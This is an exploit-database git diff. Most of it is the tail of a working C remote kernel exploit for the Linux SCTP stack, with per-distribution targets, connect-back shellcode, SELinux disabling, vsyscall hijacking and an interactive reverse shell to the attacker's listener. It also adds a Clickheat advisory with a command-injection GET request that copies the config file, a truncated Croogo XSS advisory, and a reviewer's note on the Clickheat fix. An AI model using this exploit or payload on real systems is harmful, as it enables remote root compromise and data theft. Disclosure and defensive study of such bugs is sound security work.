"ubuntu64_intrepid-2.6.27-[9-last]-server", + "(kernel 2.6.27-9 to the last unpatched kernel -- server)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_27_9tolast_server_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 96, + 8, + NULL, + SLUB_ALLOCATOR + }, + { + "ubuntu64_intrepid-2.6.27-[7-last]-generic", + "(kernel 2.6.27-9 to the last unpatched kernel -- server)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_27_7tolast_generic_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 96, + 8, + NULL, + SLUB_ALLOCATOR + }, + { + "fedora64_10-2.6.25-117", + "(fedora core 10 default installed kernel)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + fedora64_10_default_kernel_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 96, + 8, + fedora64_10_default_kernel_x86_64_selinux, + SLUB_ALLOCATOR + }, + { + "opensuse64_11.1-2.6.27.7-9-default", + "(opensuse 11.1 default installed kernel)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + opensuse64_11_1_default_kernel_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 256, + 8, + NULL, + SLAB_ALLOCATOR + } +}; + + + +/* modular arithmetic shift */ +#define __SHIFT_CHECK 0x7FFF +static __u16 shift_0_to_7fff[3] = { 0x7FFF, 0xFFFE, 0x0000 }; +static __u16 shift_8000_to_ffff[3] = { 0xFFFF, 0x7FFE, 0x8000 }; + +/* global streams obj */ +static __u16 streams[1000][2]; + +/* get stream flow */ +static int build_stream(const void *data, __u32 size, __u16 fc) +{ + int chunk_num,i,j,stnum=0; + __u16 *p; + __u16 *shift; + if(size % 2) + __fatal("[!!!] 
build_stream: data unaligned"); + + memset(streams, 0x00, sizeof(streams)); + + chunk_num = size / 2; + p = (__u16*)data; + for(i=0; isport = htons(sp); + hdr->dport = htons(dp); + hdr->vtag = htonl(vtag); + hdr->checksum = 0; + fwd = (struct sctp_chunk_fwd *)(hdr->chunks); + fwd->type = SCTP_FWD; + fwd->flags = 0; + fwd->len = htons(4 + 4 + (streamlen * 4)); // chunk + ctsn + streams + fwd->new_tsn = htonl(tsn+1); + + /* build stream */ + pstream = (__u16 *)((&(fwd->new_tsn)) + 1); + for(i=0; ilen) + sizeof(*hdr); + hdr->checksum = htonl(sctp_crc32c(__buff, (__u32)(*p_len))); + return hdr; +} + + + +/* this function gets VTAG/TSN bound with this socket pair */ +int raw_socket_engine(__u16 sp, __u16 sp2, __u16 dp, + __u32 *tsn, __u32 *vtag, __u32 *tsn2, __u32 *vtag2) +{ + char packet[1500]; + int p_len; + void *end; + struct sctp_hdr *hdr; + struct sctp_chk *chk; + __u32 tmp; + __u16 psp,pdp; + fd_set r; + struct timeval tv; + + int raw_fd = socket(PF_INET, SOCK_RAW, IPPROTO_SCTP); + if(raw_fd < 0) + __fatal_perror("socket: RAW/SCTP"); + + + FD_ZERO(&r); + FD_SET(raw_fd, &r); + tv.tv_usec=0; + tv.tv_sec=10; + + while(select(raw_fd + 1, &r, NULL,NULL,&tv) > 0) + { + p_len = read(raw_fd, packet, sizeof(packet)); + end = packet + p_len; + hdr = (struct sctp_hdr *)(packet + sizeof(struct iphdr)); + if((void*)(((char *)hdr)+4) >= end) + continue; + + /* check for chunk */ + chk = (struct sctp_chk *)(hdr->chunks); + tmp = ntohl(*((__u32*)(chk->data))); + psp = ntohs(hdr->sport); + pdp = ntohs(hdr->dport); + + if(chk->type == SCTP_SACK) + { + if(psp == dp && pdp == sp) + *tsn = tmp; + + if(psp == dp && pdp == sp2) + *tsn2 = tmp; + } + + if(chk->type == SCTP_INIT_ACK) + { + if(psp == dp && pdp == sp) + *vtag = tmp; + + if(psp == dp && pdp == sp2) + *vtag2 = tmp; + } + + if(*vtag && *tsn && *vtag2 && *tsn2) + break; + + FD_ZERO(&r); + FD_SET(raw_fd, &r); + tv.tv_usec=0; + tv.tv_sec=10; + } + + return 0; +} + +/* global vars */ +static __u16 sport=0; +static __u16 sport2=0; 
+static __u32 vtag=0, vtag2=0; +static __u32 tsn=0, tsn2=0; + +static struct sockaddr_in server_sctp; +int raw_sctp=-1; + +#define STACK_SIZE 0x1000 +char clone_stack[STACK_SIZE*2]; + + +static void send_fwd_chunk(__u16 sp, __u16 dp, __u16 streams[][2], + int streamlen, __u32 vtag, __u32 tsn) +{ + int p_len=0, ret; + void *packet = make_fwd_packet(sp, dp, vtag, tsn, streams, streamlen, &p_len); + ret = sendto(raw_sctp, packet, p_len, 0, (struct sockaddr *)&server_sctp, sizeof(struct sockaddr_in)); + if(ret < 0) + __fatal_perror("sendto: sending FWD chunk"); + + free(packet); +} + + + +static int clone_thread(void *p) +{ + raw_socket_engine(sport, sport2, h.rport, &tsn, &vtag, &tsn2, &vtag2); + return 0; +} + + +static int make_sctp_connection(__u16 sp, __u16 dp, int data) +{ + struct sctp_initmsg msg; + int ret,o=1,fd; + socklen_t len_sctp=sizeof(struct sctp_initmsg); + struct sockaddr_in s,c; + + fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP); + if(fd < 0) + __fatal_perror("socket: sctp SOCK_STREAM"); + + ret = setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o)); + if (ret < 0) + __fatal_perror("setsockopt: SO_REUSEADDR"); + + + /* NOTE: here we assume server peer allocates 10 output streams (as default) + * if the applciation behaves differently you must probe and change channels size + * to get the correct slab */ + + if(k->allocator_type == SLAB_ALLOCATOR) // if SLAB change channel size + { + getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp); + msg.sinit_num_ostreams=50; // force 256 slab allocation + msg.sinit_max_instreams=10; + setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp); + } + else + { + getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp); + msg.sinit_num_ostreams=10; // force 96 slab allocation + msg.sinit_max_instreams=10; + setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp); + } + + + if(sp) + { + c.sin_family = PF_INET; + c.sin_port = htons(sp); + c.sin_addr.s_addr = INADDR_ANY; + ret = bind(fd, (struct sockaddr 
*)&c, sizeof(c)); + if(ret < 0) + __fatal_perror("bind: sctp socket"); + } + + s.sin_family = PF_INET; + s.sin_port = htons(dp); + s.sin_addr.s_addr = inet_addr(h.rhost); + + ret = connect(fd, (struct sockaddr *)&s, sizeof(s)); + if(ret < 0) + __fatal_perror("connect: sctp socket"); + + + /* send one byte of data to get correctly + * TSN from raw socket (from SACK replies) + */ + if(data) + { + ret = send(fd, "", 1, 0); + if(ret < 0) + __fatal_perror("send: sctp socket data"); + } + return fd; +} + + +static void htons_streams(__u16 s[][2], int len) +{ + int i; + for(i=0; ivsyspatchjump, k->vsyspatchjumpsize, 0); + if(ret < 0) + __fatal("Error Building Streams..."); + + htons_streams(streams, ret); + send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2); + +} + + +static void multiplex(int listenfd) +{ + int ret,new_fd; + fd_set r; + struct timeval t; + char buffer[1500]; + + + FD_ZERO(&r); + FD_SET(listenfd, &r); + t.tv_sec = 3; + t.tv_usec = 0; + __msg("[**] Waiting daemons executing gettimeofday().. 
this can take up to one minute...\n"); + __msg("[**] .."); + fflush(stdout); + + while(select(listenfd+1, &r, NULL, NULL, &t) == 0) + { + printf(".."); + fflush(stdout); + t.tv_sec = 3; + t.tv_usec = 0; + FD_ZERO(&r); + FD_SET(listenfd, &r); + } + __msg("..\n"); + + new_fd = accept(listenfd, NULL, 0); + if(new_fd < 0) + __fatal_perror("accept: listen fd"); + + + __msg("[**] Connected!\n"); + patchjump(); + + close(listenfd); + + write(new_fd, "id\n", 3); + + FD_ZERO(&r); + FD_SET(new_fd, &r); + FD_SET(0, &r); + while(select(new_fd+1, &r, NULL, NULL, NULL) > 0) + { + if(FD_ISSET(0, &r)) // read from stdin + { + ret = read(0, buffer, sizeof(buffer)); + if(ret < 0) + __fatal_perror("read: from stdin"); + else + ret = write(new_fd, buffer, ret); + } + + if(FD_ISSET(new_fd, &r)) + { + ret = read(new_fd, buffer, sizeof(buffer)); + if(!ret) { + __msg("Endopoint closed the connection\n"); + break; + } + else if(ret > 0) + { + write(1, buffer, ret); + } + else + __fatal_perror("read: from net"); + } + + FD_ZERO(&r); + FD_SET(new_fd, &r); + FD_SET(0, &r); + } + +} + + +/* needed when exploiting old SLAB */ +void swap_to_SLAB_chunk() +{ + __u32 tmp; + __u16 tmp16; + + tmp = tsn; + tsn = tsn2; + tsn2 = tmp; + + tmp = vtag; + vtag = vtag2; + vtag2 = tmp; + + tmp16 = sport; + sport = sport2; + sport2 = tmp16; +} + + + +int main(int argc, char **argv) +{ + + int ret, fd, i, listenfd,o=1; + struct sockaddr_in l; + __u32 lh; + __u16 lp; + + sctp_getopt(argc, argv); + + listenfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); + if(setsockopt(listenfd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o)) < 0) + __fatal_perror("setsockopt: SO_REUSEADDR"); + + l.sin_family = PF_INET; + l.sin_port = htons(h.lport); + l.sin_addr.s_addr = inet_addr(h.lhost); + if(bind(listenfd, (struct sockaddr *)&l, sizeof(l)) < 0) + __fatal_perror("bind: sock"); + + if(listen(listenfd, 4) < 0) + __fatal_perror("listen: sock"); + + + /* set connect back params */ + lh = inet_addr(h.lhost); + lp = 
htons(h.lport); + memcpy(k->scode + k->portoff, &lp, 2); + memcpy(k->scode + k->hostoff, &lh, 4); + + raw_sctp = socket(PF_INET, SOCK_RAW, IPPROTO_SCTP); + if(raw_sctp < 0) + __fatal_perror("socket: RAW/SCTP montitor socket"); + + server_sctp.sin_family = PF_INET; + server_sctp.sin_port = htons(h.rport); + server_sctp.sin_addr.s_addr = inet_addr(h.rhost); + + __msg("[**] Monitoring Network for TSN/VTAG pairs.. \n"); + ret = clone(clone_thread, clone_stack+STACK_SIZE-8, CLONE_VM|SIGCHLD, NULL); + if(ret < 0) + __fatal_perror("clone"); + + sleep(1); + + __msg("[**] Start flushing slub cache...\n"); + for(i=0; i<=h.nconn; i++) + { + __u16 p = sport-(h.nconn-1)+i; + if(p == sport || p== sport2) + fd = make_sctp_connection(p, h.rport, 1); + else + fd = make_sctp_connection(sport-(h.nconn-1)+i, h.rport, 0); +// usleep(10); + } + + + disable_abort(); + /* wait for monitoring engine */ + wait(NULL); + + if(k->allocator_type == SLAB_ALLOCATOR) + swap_to_SLAB_chunk(); + + if(vtag && tsn && vtag2 && tsn2) + { + __u32 acc; + + __msg_f("[**] Using TSN/VTAG pairs: (TSN: %x <=> VTAG: %x) / (TSN: %x <=> VTAG: %x)...\n", tsn, vtag, tsn2, vtag2); + sleep(1); + + if(k->selinux) + { + __msg("[**] Overwriting neightboard sctp map..\n"); + acc = (k->slubsize - k->chunksize) / 2; + ret = build_stream(k->selinux, k->ptrsize, acc); + if(ret < 0) + __fatal("Error Building Streams..."); + + htons_streams(streams, ret); + send_fwd_chunk(sport, h.rport, streams, ret, vtag, tsn); + + __msg("[**] Disabling Selinux Enforcing Mode..\n"); + ret = build_stream(__zero, 4, 0); + if(ret < 0) + __fatal("Error Building Streams..."); + + htons_streams(streams, ret); + send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2); + } + + __msg("[**] Overwriting neightboard sctp map ......\n"); + acc = (k->slubsize - k->chunksize) / 2; + ret = build_stream(k->vsysaddr, k->ptrsize, acc); + if(ret < 0) + __fatal("Error Building Streams..."); + + htons_streams(streams, ret); + send_fwd_chunk(sport, h.rport, 
streams, ret, vtag, tsn); + + __msg("[**] Overwriting vsyscall shadow map..\n"); + acc = 0x930 / 2; + ret = build_stream(k->scode, k->scodesize, acc); //1176 + if(ret < 0) + __fatal("Error Building Streams..."); + + htons_streams(streams, ret); + send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2); + + __msg("[**] Hijacking vsyscall shadow map..\n"); + ret = build_stream(k->vsysjump, k->vsysjumpsize, 0); + if(ret < 0) + __fatal("Error Building Streams..."); + + htons_streams(streams, ret); + send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2); + + sleep(1); + } + else + __fatal("VTAG/TSN not found: network error"); + + + multiplex(listenfd); + __msg("[**] Closing Connection... \n"); + return 0; +} + +// milw0rm.com [2009-04-28] diff --git a/platforms/perl/webapps/37115.txt b/platforms/perl/webapps/37115.txt new file mode 100755 index 000000000..93f7e8a52 --- /dev/null +++ b/platforms/perl/webapps/37115.txt 
@@ -0,0 +1,37 @@
+Clickheat 1.13+ Unauthenticated RCE
+-----------------------------------
+
+The Clickheat developers have been informed, but have not responded to my email. The code has not been updated recently and the project seems to be in an abandoned state.
+
+I have discovered a vulnerability in Clickheat 1.13 onwards that would allow an attacker to execute arbitrary commands on the remote webserver, in the context of the user running the webserver, without authentication. This could lead to unauthenticated access to the Clickheat web application, and potentially complete takeover of the remote webserver.
+
+For the exploit to be successful, the webserver (Apache was tested in this case) must be configured to handle Perl (.pl) scripts and have the ExecCGI directive present in the VirtualHost configuration.
+
+The issue stems from a script called parseClickLogs.pl in the /scripts directory of clickheat. If the Apache configuration is setup as above, this script will be executed when a user visits /clickheat/scripts/parseClickLogs.pl, as shown in Apache logs:
+
+[Tue May 12 13:36:27.068012 2015] [cgi:error] [pid 10783] [client 127.0.0.1:45523] AH01215: usage: ./parseClickLogs.pl apache_logs_file dest_path [domain_ignored]
+[Tue May 12 13:36:27.070133 2015] [cgi:error] [pid 10783] [client 127.0.0.1:45523] End of script output before headers: parseClickLogs.pl
+
+Arbitrary parameters can be supplied to the script directly from the URL, separated by +'s.
+
+In the script, on line 48 is a vulnerable open() command:
+
+open(LOGFILE, $srcFile) or die("Impossible d'ouvrir le fichier ".$srcFile);
+
+The open() command is vulnerable because the $srcFile parameter has not been sanitized in any way, it is simply the first parameter passed into the script. Also the open() command has not been explicitly set for input only, meaning its behavior can be manipulated by appending a pipe (|) symbol to input parameters. See here for discussion: http://www.cgisecurity.com/lib/sips.html.
+
+POC
+----
+The following POC shows how to gain access to the Clickheat configuration data by copying /clickheat/config/config.php to a plain text file for viewing.
+
+- Copy config.php using arbitrary commands on the server:
+GET /clickheat/scripts/parseClickLogs.pl?cp ../config/config.php conf.txt|+two
+
+- View newly created copy of config.php (\ is appended to the filename)
+GET /clickheat/scripts/conf.txt\
+
+Mitigation
+----------
+A simple mitigation would be to either remove this script if it is not required by the core functionality of Clickheat, or move it outside of the publicly accessible HTML path. You could also explicitly set the open() to only allow for input, such as:
+
+open(LOGFILE, "<$srcFile") or die("Impossible d'ouvrir le fichier ".$srcFile);
\ No newline at end of file
diff --git a/platforms/perl/webapps/37117.txt b/platforms/perl/webapps/37117.txt
new file mode 100755
index 000000000..22e6beed5
--- /dev/null
+++ b/platforms/perl/webapps/37117.txt
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/53287/info
+
+Croogo CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Croogo CMS 1.3.4 is vulnerable; other versions may also be affected.
+
+URL: http://www.example.com/croogo/admin/users
+
+">
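Review bot: The mitigation proposed in the last line of the Clickheat advisory, `open(LOGFILE, "<$srcFile")`, is still the two-argument form of open(), which keeps interpreting the filename string (a bare `-` after the `<` selects STDIN, and leading/trailing whitespace is stripped), so it closes only the trailing-pipe trick rather than the class of bug; the three-argument form with a lexical handle separates mode from path: `open(my $logfile, '<', $srcFile) or die("Impossible d'ouvrir le fichier ".$srcFile);`. Even with that change, the usage line quoted from the Apache log shows the script takes an attacker-chosen input file and a `dest_path`, so an unauthenticated request presumably still gives arbitrary file read and write as the web-server user — the script body beyond line 48 is not in the hunk, so that part is inferred. The advisory's first suggestion, removing the script from the document root or denying ExecCGI for /clickheat/scripts, should therefore be stated as the required fix, with the open() change as defence in depth rather than an alternative.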